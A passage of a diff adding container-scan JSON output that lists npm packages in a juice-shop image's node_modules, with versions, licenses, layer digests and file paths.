"pkg:npm/dfa@1.2.0", + "UID": "4099ba0465d6feaa" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/dfa/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "doctypes@1.1.0", + "Name": "doctypes", + "Identifier": { + "PURL": "pkg:npm/doctypes@1.1.0", + "UID": "be8cbb198f1cd0df" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/doctypes/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "domelementtype@1.3.1", + "Name": "domelementtype", + "Identifier": { + "PURL": "pkg:npm/domelementtype@1.3.1", + "UID": "8ed557ce4a93bc77" + }, + "Version": "1.3.1", + "Licenses": [ + "BSD-2-Clause" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sanitize-html/node_modules/domelementtype/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "domhandler@2.1.0", + "Name": "domhandler", + "Identifier": { + "PURL": "pkg:npm/domhandler@2.1.0", + "UID": "5efc7df5b9f6710a" + }, + "Version": "2.1.0", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sanitize-html/node_modules/domhandler/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "domutils@1.1.6", + "Name": "domutils", + "Identifier": { + "PURL": "pkg:npm/domutils@1.1.6", + "UID": "443cf9503aa36a1b" + }, + "Version": "1.1.6", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sanitize-html/node_modules/domutils/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "dottie@2.0.7", + "Name": "dottie", + "Identifier": { + "PURL": "pkg:npm/dottie@2.0.7", + "UID": "1b07b1942254cf93" + }, + "Version": "2.0.7", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/dottie/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "double-ended-queue@0.9.7", + "Name": "double-ended-queue", + "Identifier": { + "PURL": "pkg:npm/double-ended-queue@0.9.7", + "UID": "d832955927454743" + }, + "Version": "0.9.7", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/double-ended-queue/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "download@8.0.0", + "Name": "download", + "Identifier": { + "PURL": "pkg:npm/download@8.0.0", + "UID": "331994a48e6f1680" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/download/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "dunder-proto@1.0.1", + "Name": "dunder-proto", + "Identifier": { + "PURL": "pkg:npm/dunder-proto@1.0.1", + "UID": "32738518e87ec0a7" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/dunder-proto/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "duplexer2@0.1.4", + "Name": "duplexer2", + "Identifier": { + "PURL": "pkg:npm/duplexer2@0.1.4", + "UID": "b6b88322074726c3" + }, + "Version": "0.1.4", + "Licenses": [ + "BSD-3-Clause" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/duplexer2/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "duplexer3@0.1.5", + "Name": "duplexer3", + "Identifier": { + "PURL": "pkg:npm/duplexer3@0.1.5", + "UID": "cf17889c72a1d6ea" + }, + "Version": "0.1.5", + "Licenses": [ + "BSD-3-Clause" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/duplexer3/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "eastasianwidth@0.2.0", + "Name": "eastasianwidth", + "Identifier": { + "PURL": "pkg:npm/eastasianwidth@0.2.0", + "UID": "8529e6db2e772f9f" + }, + "Version": "0.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/eastasianwidth/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ee-first@1.1.1", + "Name": "ee-first", + "Identifier": { + "PURL": "pkg:npm/ee-first@1.1.1", + "UID": "911ddfc016c7710d" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/ee-first/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "eivindfjeldstad-dot@0.0.1", + "Name": "eivindfjeldstad-dot", + "Identifier": { + "PURL": "pkg:npm/eivindfjeldstad-dot@0.0.1", + "UID": "88518845ed739d34" + }, + "Version": "0.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/eivindfjeldstad-dot/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "emoji-regex@8.0.0", + "Name": "emoji-regex", + "Identifier": { + "PURL": "pkg:npm/emoji-regex@8.0.0", + "UID": "de6f3e212c2ba67f" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/emoji-regex/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "emoji-regex@9.2.2", + "Name": "emoji-regex", + "Identifier": { + "PURL": "pkg:npm/emoji-regex@9.2.2", + "UID": "764505630443497" + }, + "Version": "9.2.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@isaacs/cliui/node_modules/emoji-regex/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "emoji-regex@9.2.2", + "Name": "emoji-regex", + "Identifier": { + "PURL": "pkg:npm/emoji-regex@9.2.2", + "UID": "c8d3eef6cee6358e" + }, + "Version": "9.2.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/wrap-ansi/node_modules/emoji-regex/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "enabled@2.0.0", + "Name": "enabled", + "Identifier": { + "PURL": "pkg:npm/enabled@2.0.0", + "UID": "d3979a5c34cb9abd" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/enabled/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "encodeurl@2.0.0", + "Name": "encodeurl", + "Identifier": { + "PURL": "pkg:npm/encodeurl@2.0.0", + "UID": "3f012eee0f91d0d8" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/encodeurl/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "encoding@0.1.13", + "Name": "encoding", + "Identifier": { + "PURL": "pkg:npm/encoding@0.1.13", + "UID": "ce03a34b9f363ae4" + }, + "Version": "0.1.13", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/encoding/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "end-of-stream@1.4.5", + "Name": "end-of-stream", + "Identifier": { + "PURL": "pkg:npm/end-of-stream@1.4.5", + "UID": "16c7b95c463979c6" + }, + "Version": "1.4.5", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/end-of-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "engine.io@4.1.2", + "Name": "engine.io", + "Identifier": { + "PURL": "pkg:npm/engine.io@4.1.2", + "UID": "e41317b2cfdf8e27" + }, + "Version": "4.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/engine.io/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "engine.io-parser@4.0.3", + "Name": "engine.io-parser", + "Identifier": { + "PURL": "pkg:npm/engine.io-parser@4.0.3", + "UID": "9427c5fa4693ba20" + }, + "Version": "4.0.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/engine.io-parser/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "env-paths@2.2.1", + "Name": "env-paths", + "Identifier": { + "PURL": "pkg:npm/env-paths@2.2.1", + "UID": "90970aeafd5f9213" + }, + "Version": "2.2.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/env-paths/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "err-code@2.0.3", + "Name": "err-code", + "Identifier": { + "PURL": "pkg:npm/err-code@2.0.3", + "UID": "c49b53b167a169c5" + }, + "Version": "2.0.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/err-code/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "errorhandler@1.5.2", + "Name": "errorhandler", + "Identifier": { + "PURL": "pkg:npm/errorhandler@1.5.2", + "UID": "d0240ac4538b56fc" + }, + "Version": "1.5.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/errorhandler/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "es-define-property@1.0.1", + "Name": "es-define-property", + "Identifier": { + "PURL": "pkg:npm/es-define-property@1.0.1", + "UID": "4180e5af652ac5b0" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/es-define-property/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "es-errors@1.3.0", + "Name": "es-errors", + "Identifier": { + "PURL": "pkg:npm/es-errors@1.3.0", + "UID": "f6cf2e4d32ece532" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/es-errors/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "es-get-iterator@1.1.3", + "Name": "es-get-iterator", + "Identifier": { + "PURL": "pkg:npm/es-get-iterator@1.1.3", + "UID": "697471e72e4767ee" + }, + "Version": "1.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/es-get-iterator/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "es-object-atoms@1.1.1", + "Name": "es-object-atoms", + "Identifier": { + "PURL": "pkg:npm/es-object-atoms@1.1.1", + "UID": "ed20130ca21a2ef9" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/es-object-atoms/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "escape-html@1.0.3", + "Name": "escape-html", + "Identifier": { + "PURL": "pkg:npm/escape-html@1.0.3", + "UID": "a2c55cf021fa86b1" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/escape-html/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "escape-string-regexp@1.0.5", + "Name": "escape-string-regexp", + "Identifier": { + "PURL": "pkg:npm/escape-string-regexp@1.0.5", + "UID": "8ac9be72f39800bb" + }, + "Version": "1.0.5", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/escape-string-regexp/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "esprima@1.0.4", + "Name": "esprima", + "Identifier": { + "PURL": "pkg:npm/esprima@1.0.4", + "UID": "504e4e4902da8dca" + }, + "Version": "1.0.4", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/notevil/node_modules/esprima/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "esprima@4.0.1", + "Name": "esprima", + "Identifier": { + "PURL": "pkg:npm/esprima@4.0.1", + "UID": "cd237560af49870c" + }, + "Version": "4.0.1", + "Licenses": [ + "BSD-2-Clause" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/esprima/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "etag@1.8.1", + "Name": "etag", + "Identifier": { + "PURL": "pkg:npm/etag@1.8.1", + "UID": "1d1b85f5bac6104c" + }, + "Version": "1.8.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/etag/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ethers@6.16.0", + "Name": "ethers", + "Identifier": { + "PURL": "pkg:npm/ethers@6.16.0", + "UID": "eb82d708b4388b03" + }, + "Version": "6.16.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/ethers/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "event-target-shim@5.0.1", + "Name": "event-target-shim", + "Identifier": { + "PURL": "pkg:npm/event-target-shim@5.0.1", + "UID": "30001073e8a310d8" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/event-target-shim/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "eventemitter2@0.4.14", + "Name": "eventemitter2", + "Identifier": { + "PURL": "pkg:npm/eventemitter2@0.4.14", + "UID": "a64ded680490f6c8" + }, + "Version": "0.4.14", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt/node_modules/eventemitter2/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "eventemitter3@1.1.1", + "Name": "eventemitter3", + "Identifier": { + "PURL": "pkg:npm/eventemitter3@1.1.1", + "UID": "b231b809f234c291" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/eventemitter3/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "events@3.3.0", + "Name": "events", + "Identifier": { + "PURL": "pkg:npm/events@3.3.0", + "UID": "c7717c7832db7ef7" + }, + "Version": "3.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/events/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "eventsource-parser@3.0.8", + "Name": "eventsource-parser", + "Identifier": { + "PURL": "pkg:npm/eventsource-parser@3.0.8", + "UID": "b5e18d9eeb6bb295" + }, + "Version": "3.0.8", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/eventsource-parser/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "exit@0.1.2", + "Name": "exit", + "Identifier": { + "PURL": "pkg:npm/exit@0.1.2", + "UID": "1ee077c03c24a76b" + }, + "Version": "0.1.2", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/exit/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "exit-x@0.2.2", + "Name": "exit-x", + "Identifier": { + "PURL": "pkg:npm/exit-x@0.2.2", + "UID": "aae05d71a8c0a97a" + }, + "Version": "0.2.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/exit-x/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "expand-template@2.0.3", + "Name": "expand-template", + "Identifier": { + "PURL": "pkg:npm/expand-template@2.0.3", + "UID": "7ffcf07f65f4dace" + }, + "Version": "2.0.3", + "Licenses": [ + "(MIT OR WTFPL)" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/expand-template/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "expand-tilde@2.0.2", + "Name": "expand-tilde", + "Identifier": { + "PURL": "pkg:npm/expand-tilde@2.0.2", + "UID": "4dd79957cb4bd060" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/expand-tilde/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "exponential-backoff@3.1.3", + "Name": "exponential-backoff", + "Identifier": { + "PURL": "pkg:npm/exponential-backoff@3.1.3", + "UID": "12bd6202514e43ed" + }, + "Version": "3.1.3", + "Licenses": [ + "Apache-2.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/exponential-backoff/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "express@4.22.2", + "Name": "express", + "Identifier": { + "PURL": "pkg:npm/express@4.22.2", + "UID": "e07b7292e86dd180" + }, + "Version": "4.22.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/express/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "express-ipfilter@1.4.0", + "Name": "express-ipfilter", + "Identifier": { + "PURL": "pkg:npm/express-ipfilter@1.4.0", + "UID": "20f30ea4e2cbe46f" + }, + "Version": "1.4.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/express-ipfilter/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "express-jwt@0.1.3", + "Name": "express-jwt", + "Identifier": { + "PURL": "pkg:npm/express-jwt@0.1.3", + "UID": "6c1d77484eafca2e" + }, + "Version": "0.1.3", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/express-jwt/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "express-rate-limit@7.5.1", + "Name": "express-rate-limit", + "Identifier": { + "PURL": "pkg:npm/express-rate-limit@7.5.1", + "UID": "95a8a024bbf3f62e" + }, + "Version": "7.5.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/express-rate-limit/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "express-robots-txt@0.5.0", + "Name": "express-robots-txt", + "Identifier": { + "PURL": "pkg:npm/express-robots-txt@0.5.0", + "UID": "e8c7b2cef9d96c47" + }, + "Version": "0.5.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": 